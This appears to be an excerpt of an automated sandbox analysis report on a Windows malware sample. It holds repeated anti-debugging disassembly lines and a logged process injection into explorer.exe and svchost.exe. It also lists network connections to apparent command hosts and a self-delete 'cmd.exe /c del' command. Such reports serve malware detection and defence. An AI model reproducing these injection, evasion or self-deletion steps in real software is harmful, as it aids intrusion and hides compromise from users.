            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016D41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016F8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016735A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01672990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01702073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01711074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01660050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01660050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01714015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01714015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_017014FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01718CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016890AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01718F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01673B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01673B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01718B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01644F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01644F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0170131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0171070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0171070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016837F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01715BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01651B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01651B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016FD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01672397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01658794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0170138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016FB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016FB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0168927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01718A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016D4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016FFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01678E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01658A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0164AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01663A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01672AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016716E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016576E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01718ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016736CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01672ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016FFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01688EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016C46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0165AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_016DFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_0167D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeCode function: 2_2_01689540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7F9D5 SetUnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C88EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.221 80
            Source: C:\Windows\explorer.exeNetwork Connect: 5.101.152.161 80
            Source: C:\Windows\explorer.exeDomain query: www.nordenergogrup.store
            Source: C:\Windows\explorer.exeDomain query: www.sandstormcase.us
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 350000
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeThread APC queued: target process: C:\Windows\explorer.exe
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeThread register set: target process: 3452
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeThread register set: target process: 3452
            Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3452
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeProcess created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess created: C:\Users\user\AppData\Local\Temp\bstkiooen.exe "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
            Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
            Source: explorer.exe, 00000003.00000000.334292418.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.304261536.0000000006770000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
